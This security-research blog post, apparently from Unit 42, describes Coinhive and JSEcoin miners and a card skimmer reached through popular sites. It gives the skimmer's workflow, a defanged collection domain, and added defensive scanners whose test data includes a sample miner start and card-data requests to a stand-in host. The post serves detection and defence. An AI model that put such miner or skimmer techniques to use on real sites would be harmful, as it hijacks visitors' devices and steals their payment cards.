Top Alexa Sites Infected With Malicious Coinminers and Web Skimmer



Executive Summary

Unit 42 recently launched a threat hunting campaign among the top 10,000 websites globally on Alexa. Alexa rankings are a measure of website popularity, based on visitor interactions and number of visits. We found four sites that were affected, as outlined in Table 1. In the analysis that follows, we describe the malicious activity in more detail, covering malicious coinminers, which hijack CPU resources to mine cryptocurrency; malicious external links, which direct users to malicious sites; and a web skimmer attack, which is designed to steal payment card details from checkout forms.

Affected Domain     | Affected Type           | Attack Type         | Alexa Rank (as of June 15, 2020) | Site Type
libero[.]it         | Malicious External Link | Malicious Coinminer | 607                              | The number one website in Italy, offers various types of content and services: webmail, search engine, news and more.
pojoksatu[.]id      | Compromised Site        | Malicious Coinminer | 1494                             | News website in Indonesia.
www[.]heureka[.]cz  | Malicious External Link | Web Skimmer         | 5204                             | The largest e-commerce platform in Central and Eastern European markets.
zoombangla[.]com    | Compromised Site        | Malicious Coinminer | 6579                             | News website in Bangladesh.

Table 1. Summary of affected top Alexa sites.

Palo Alto Networks customers are protected from the aforementioned threats by the URL Filtering and Threat Prevention cloud-delivered security subscriptions.

Compromised Sites

Malicious Coinminers

Coinhive was a browser mining service that offered a JavaScript miner for the Monero blockchain. It shut down in March 2019, in part because it was widely abused by cybercriminals. There are two websites still serving Coinhive’s miner script. One is coinhive.min.js and the other is JSEcoin. Figure 1, below, shows the commands issued to start the coinminer on a compromised website – zoombangla[.]com.

The source on a compromised website, zoombangla[.]com, shows commands used to start malicious coinminers and set parameters for them, including how much of a victim's CPU it will utilize.
Figure 1. Commands to start the Coinhive miner with defined parameters.
The miner's parameters control how many threads it uses and what share of the victim's CPU it consumes; the available throttle values are shown in Table 2. Oddly, the code above configures the miner to rapidly drain the battery of an infected device, perhaps because the attackers felt a need to make the most use possible of any successfully compromised victims. Most attackers keep a compromised device's power usage low to avoid detection and keep making money illicitly. In this case, however, it appears the attackers rushed to mine and did not configure it correctly.


Throttle     | CPU usage limit
0 (Default)  | 100%
0.3          | 80%
0.5          | 50% - 70%

Table 2. Parameter throttle and CPU usage map.

Another example of the commands to start the Coinhive mining script is shown below, from a different website we found serving it – pojoksatu[.]id.

The source on a compromised website, pojoksatu[.]id, shows default commands used to start malicious coinminers.
Figure 2. Commands to start the Coinhive miner with default parameters.
Once a user visits either of the above sites, the coinmining script would automatically run and start mining for the attacker. The user’s CPU load would increase as shown in Figure 3.

An example of CPU load activity when affected by malicious coinminers.
Figure 3. CPU load activity

Overall, we found more than 60 pages on pojoksatu[.]id and zoombangla[.]com injected with Coinhive mining scripts. Details are in the Appendix.
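As an added example (not code from the Unit 42 post), the following Node.js script scans saved page source for the miner loaders named above and reads the throttle option out of any inline miner configuration, mapping it to the CPU usage levels of Table 2 and flagging the battery-draining default. The miner.example host, the placeholder site key and the CoinHive.Anonymous constructor in the constructed sample HTML are assumptions for illustration.

```javascript
// Miner loaders named in the post; matching JSEcoin by name is an assumption.
const MINER_LOADERS = [
  { miner: "Coinhive", pattern: /coinhive\.min\.js/i },
  { miner: "JSEcoin", pattern: /jsecoin/i },
];

// Table 2 from the post: throttle option -> share of the CPU the miner will take.
function cpuUsageForThrottle(throttle) {
  if (throttle >= 0.5) return "50% - 70%";
  if (throttle >= 0.3) return "80%";
  return "100%";
}

// Scan saved HTML for miner loader <script src> tags and inline miner configuration.
function scanForMiners(html) {
  const findings = [];
  const scriptSrc = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = scriptSrc.exec(html)) !== null) {
    for (const { miner, pattern } of MINER_LOADERS) {
      if (pattern.test(m[1])) findings.push({ kind: "loader", miner, src: m[1] });
    }
  }
  // Inline config: a "throttle" option; absent or 0 means the whole CPU is used (Table 2).
  const throttleOpt = /\bthrottle\s*:\s*(\d*\.?\d+)/gi;
  const throttles = [];
  while ((m = throttleOpt.exec(html)) !== null) throttles.push(parseFloat(m[1]));
  if (findings.length > 0) {
    const throttle = throttles.length > 0 ? Math.min(...throttles) : 0;
    findings.push({ kind: "config", throttle, cpuUsage: cpuUsageForThrottle(throttle),
                    drainsBattery: throttle === 0 });
  }
  return findings;
}

// Constructed page source modelled on the behaviour described for Figure 1;
// host, site key and constructor name are placeholders/assumptions.
const SAMPLE_HTML = `<html><head>
<script src="https://miner.example/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('PLACEHOLDER_SITE_KEY', {throttle: 0});
miner.start();</script></head><body>news</body></html>`;
console.log(scanForMiners(SAMPLE_HTML));
```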

Malicious External Links

External link security has become increasingly important. As email services have improved at spotting spam and other types of malicious messages, attackers are using open redirects with external links instead. If attackers publish a malicious URL in a post on a legitimate website, likely very few visitors would find it suspicious. If users click on the link – or even hover over it to check it first – they will see the valid website in the link, but they will end up at a malicious site the attacker wants to redirect them to. The user would then be infected with some sort of malware, such as a malicious coinminer, or their personal information may be stolen.

Figure 4 shows a legitimate used-car section of libero[.]it where you can search and compare vehicles. Attackers inserted malicious links into car advertisements, which redirected visitors interested in the vehicle to a malicious site that served them the JSEcoin coinmining script, as shown in Figures 5-7. Please note that the JSEcoin platform closed down on April 4, 2020. The scripts will still run, but the attackers aren't able to collect coins from them anymore.

This shows an example of how attackers can insert malicious external links into compromised websites, such as the legitimate used car website shown here.
Figure 4. External link in libero[.]it, which would redirect visitors to compromised sites.
The source page would look like this:

This image shows all the external links, which are highlighted, pointing to libero[.]it. Though the link appears legitimate, clicking it redirects the user to a malicious site.
Figure 5. Source codes of the page containing malicious links.
As you can see in Figure 5, all the external links, which are highlighted, point to libero[.]it. If you want to know more about the car, you would need to click the link. Then you would be redirected to the malicious site.

The areas highlighted in red show how the redirect chain works, taking a user from a legitimate website to a malicious site.
Figure 6. Redirect chain.

This site is where the malicious coinminer is injected.

This shows the source of www.clicautosate[.]it, where commands start the JSEcoin malicious coinminer.
Figure 7. Commands to start the JSEcoin miner.

Web Skimmer

A web skimmer attack, also known as e-skimming or a Magecart attack, is a type of attack in which a payment page on a website is compromised and injected with malicious code in order to steal payment card details as they are entered into checkout forms.

The example we found among top-ranked websites on Alexa stems from another external link security issue. heureka[.]cz itself is an online shopping website. If you search for anti-COVID products (the top search keywords on the site), it shows a list of related products.

This is an example of anti-COVID products on a top-ranked website on Alexa. Issues with external link security open the user up to attacks when looking through these popular product lists.
Figure 8. Product example.

One store is listed for this product, and you can choose to buy from it.

This shows a link in heureka[.]cz which apparently advertises anti-COVID products, but actually redirects the user to compromised sites.
Figure 9. Link in heureka[.]cz to compromised sites.
The source page looks like this:

Source code of the page on heureka[.]cz containing malicious links, which are highlighted.
Figure 10. Source code of the page containing malicious links, which are highlighted.
Once you click to visit this store, you would be redirected to the malicious site.

The areas highlighted in red show how the user is redirected from a legitimate website to a malicious site.
Figure 11. Redirect chain.

Unfortunately, the entire site is full of obfuscated malicious skimmer scripts, as shown in Figure 12.

In the case we're examining, the malicious site the user is redirected to is full of obfuscated malicious skimmer scripts. Because they're obfuscated, it's hard to predict what behavior they cause.
Figure 12. Obfuscated skimmer codes.

The code above is obfuscated, making its behavior hard to predict, so we had to deobfuscate it first. We then found the following functions, which stealthily monitor a user's input of their payment card information and send it out to the remote attacker server.

This function is used to validate a credit card number with the Luhn Algorithm, which is widely used to validate a variety of identification numbers, such as credit card numbers.

This is the beginning of the skimmer. It would run every 99 seconds to call the function XYRUDR. Function XYRUDR would find all the tags in [input, select, form, button, a, img].

It would set the “mousedown” event listener for the aforementioned tags.

Once the event triggers, it would call this function to get the value of the tag.

This function is used to send credit card information out to the collection server.

To recap, the skimmer work flow is:

  1. Add event listener for [input, select, form, button, a, img].
  2. When a number string passes credit card validation checks, it sends the information out.
  3. Construct the collection server URL and parameters, then send the information out.

A successful attack would send all the user information to the remote attacker server, including credit card number, address, etc.
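The skimmer's own Luhn gate can be turned against it. As an added example (not code from the post), this Node.js check applies the same validation to outbound requests captured at a proxy or by a browser extension and alerts when a Luhn-valid card number is sent to a host other than the merchant's own payment endpoint. The hosts pay.shop.example and collector.example and the sample requests are constructed for illustration.

```javascript
// Luhn checksum: the same gate the skimmer applies before exfiltrating a value.
function luhnValid(digits) {
  if (!/^\d{13,19}$/.test(digits)) return false;
  let sum = 0, dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    dbl = !dbl;
  }
  return sum % 10 === 0;
}

// Extract Luhn-valid 13-19 digit runs (spaces/dashes between digits allowed) from a query or body.
function findCardNumbers(text) {
  let decoded;
  try { decoded = decodeURIComponent(text); } catch (e) { decoded = text; } // tolerate bad %xx
  const found = new Set();
  for (const run of decoded.match(/\d(?:[ -]?\d){12,18}/g) || []) {
    const digits = run.replace(/[ -]/g, "");
    if (luhnValid(digits)) found.add(digits);
  }
  return [...found];
}

// Keep only BIN and last four in alerts so the alert log does not itself hold cardholder data.
function maskPan(pan) {
  return pan.slice(0, 6) + "*".repeat(pan.length - 10) + pan.slice(-4);
}

// requests: [{url, body}] as captured; allowedHosts: the merchant's own payment endpoints.
function flagExfiltration(requests, allowedHosts) {
  const alerts = [];
  for (const req of requests) {
    const url = new URL(req.url);
    if (allowedHosts.has(url.hostname)) continue;
    const pans = findCardNumbers(url.search + " " + (req.body || ""));
    if (pans.length > 0) alerts.push({ host: url.hostname, url: req.url, pans: pans.map(maskPan) });
  }
  return alerts;
}

// Constructed sample traffic: a legitimate charge, an exfiltration to an unknown host, and a 13-digit non-card value.
const SAMPLE_REQUESTS = [
  { url: "https://pay.shop.example/charge?card=4111111111111111", body: "" },
  { url: "https://collector.example/gate?d=1", body: "cc=4111%201111%201111%201111&name=A" },
  { url: "https://collector.example/ping", body: "id=1234567890123" },
];
const ALLOWED_HOSTS = new Set(["pay.shop.example"]);
console.log(flagExfiltration(SAMPLE_REQUESTS, ALLOWED_HOSTS));
```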

Collection Server: metahtmlhead[.]com

Collection server: metahtmlhead[.]com. The section outlined in red shows credit card information collected during the web skimmer attack being sent to the collection server.
Figure 13. Credit card information being sent to the collection server.

URL Filtering Analysis

The pie chart shows how the visits to affected sites that we observed are distributed in terms of geolocation. While most visits came from Western Europe, a substantial portion of visits also originated from the Eastern and Western U.S.
Figure 14. URL Filtering customer geolocation distribution.


This figure shows the general geographic distribution of visits to the affected sites that we observed. While most visitors clearly came from Western Europe, visitors from the Eastern U.S. and Western U.S. are not far behind. This graph indicates a broad spectrum of potential victims all across the globe.


Our research highlights that users need to exercise caution, even when visiting popular, apparently reputable websites. These are the same sites likely to generate the most income for attackers focused on malicious coinmining and web skimming. When users click a link away from a core site, they should pay attention to the full URL of the site where they end up to ensure it’s where they expected to be. A simple way to avoid malicious coinminers is to have your browser and system fully patched with endpoint security installed.

Palo Alto Networks customers are protected from the mentioned threats by the URL Filtering and Threat Prevention cloud-delivered security subscriptions.